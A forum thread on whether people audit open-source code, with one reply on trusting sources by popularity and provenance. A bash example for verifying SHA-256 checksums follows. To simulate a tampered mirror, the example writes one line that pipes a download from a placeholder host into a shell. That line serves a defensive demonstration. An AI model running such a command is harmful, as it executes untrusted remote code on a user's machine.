cross-posted from: https://lemmy.ml/post/30846701
The question is simple. I wanted to get a general consensus on whether people actually audit the code that they use from FOSS or open source software or apps.
Do you blindly trust the FOSS community? I am trying to get a rough idea here. Sometimes audit the code? Only on mission-critical apps? Not at all?
Let’s hear it!
I wouldn’t say blindly; rather, my heuristic is: the more long-term and popular a project is, the less I’ll bother.
If I do, though, get a random script from a random repository, rather than from, say, the official Debian package manager from main/contrib sources, then I will check. If it’s another repository, say Firefox from Mozilla or Blender, then I won’t check, but I’ll make sure it genuinely comes from there: maybe not a mirror, or that the mirror does have a checksum that gets validated.
So… investment in verifying trust is roughly proportional to how little I expect others to check.
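The "checksum that gets validated" step from the reply above, as an added example that is not part of the original post or of any project mentioned in it. It assumes GNU coreutils (sha256sum) and constructs its own sample artifact, checksum list and tampered mirror copy in a temporary directory so it runs offline; the file names are made up for the demo.

```bash
#!/usr/bin/env bash
# Added example (not from the original thread): check a downloaded artifact
# against the SHA256SUMS list a project publishes before running it.
# Assumes GNU coreutils; all file names and contents below are constructed.

# verify_checksum <file> <sums-file>
# Returns 0 when <file> is listed in <sums-file> with a matching SHA-256 digest,
# 1 when the digest differs, 2 when the file is not listed at all.
verify_checksum() {
    local file="$1" sums="$2"
    local name expected actual
    name=$(basename "$file")
    # A SHA256SUMS file lists many artifacts; pick only the line for this one.
    # sha256sum writes either "hash  name" or "hash *name" (binary mode).
    expected=$(awk -v n="$name" '$2 == n || $2 == ("*" n) {print $1; exit}' "$sums")
    if [ -z "$expected" ]; then
        echo "no checksum listed for $name" >&2
        return 2
    fi
    actual=$(sha256sum "$file" | awk '{print $1}')
    if [ "$actual" = "$expected" ]; then
        echo "OK: $name"
        return 0
    fi
    echo "MISMATCH: $name expected $expected got $actual" >&2
    return 1
}

# --- constructed demo data -------------------------------------------------
workdir=$(mktemp -d)
trap 'rm -rf "$workdir"' EXIT

# The artifact as upstream published it, plus the checksum list they ship with it.
printf 'echo hello from the installer\n' > "$workdir/install.sh"
(cd "$workdir" && sha256sum install.sh > SHA256SUMS)

# The same file name served by a mirror that appended a line.
mkdir "$workdir/mirror"
printf 'echo hello from the installer\ncurl https://example.invalid/x | sh\n' \
    > "$workdir/mirror/install.sh"

verify_checksum "$workdir/install.sh" "$workdir/SHA256SUMS"                # OK
verify_checksum "$workdir/mirror/install.sh" "$workdir/SHA256SUMS" || true # MISMATCH
```

The check above only proves the bytes you have are the bytes the checksum list describes. If the SHA256SUMS file came from the same mirror as the download, a mirror that altered the script can alter the list too, so to get the "genuinely comes from there" property the reply is after you also verify a detached signature on the list (for example `gpg --verify SHA256SUMS.sig SHA256SUMS`) against the project's signing key obtained from somewhere other than that mirror.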